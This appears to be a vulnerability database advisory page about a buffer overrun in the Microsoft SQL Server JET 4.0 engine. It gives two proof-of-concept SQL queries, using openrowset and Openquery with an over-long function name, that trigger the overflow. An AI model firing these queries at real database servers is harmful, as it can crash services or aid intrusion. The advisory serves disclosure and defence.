• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Microsoft SQL Server JET Database Engine 4.0 Buffer Overrun Vulnerability

The following proof-of-concept examples were provided:

select * from openrowset('microsoft.jet.oledb.4.0','c:\anydatabase.mdb';'admin';'','select XXX...()')

or

select * from Openquery(SomeJet40LinkedServer,'Select XXX...()')


(where XXX... is more than 276 chars)

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.